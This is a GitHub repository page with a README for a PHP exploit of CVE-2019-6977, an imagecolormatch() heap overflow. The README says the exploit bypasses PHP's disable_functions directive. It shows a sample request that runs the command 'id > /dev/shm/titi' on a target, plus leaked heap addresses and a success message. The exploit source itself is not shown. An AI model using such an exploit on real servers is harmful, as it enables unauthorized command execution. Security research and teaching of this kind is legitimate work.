Skip to content
Branch: master
Find file History
real real
real and real Added example output
Latest commit c49da33 Feb 27, 2019
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md Added example output Feb 27, 2019
exploit.php CVE-2019-6977-imagecolormatch: Created an exploit. Feb 27, 2019

README.md

imagecolormatch() OOB Heap Write exploit

Info

My binary exploit for CVE-2019-6977. Bug found by Simon Scannell from RIPS.

PHP bug is here. Helps you bypass PHP's disable_functions INI directive.

I commented a lot to help people that are new to binary PHP exploitation. Hope this helps.

Output

GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
Nenuphar.ce: 0x7fe834a10018
Nenuphar2.ce: 0x7fe834a10d70
Nenuphar.properties: 0x7fe834a01230
z.val: 0x7fe834aaea18
Difference: 0xad7e8

Exploit SUCCESSFUL !
You can’t perform that action at this time.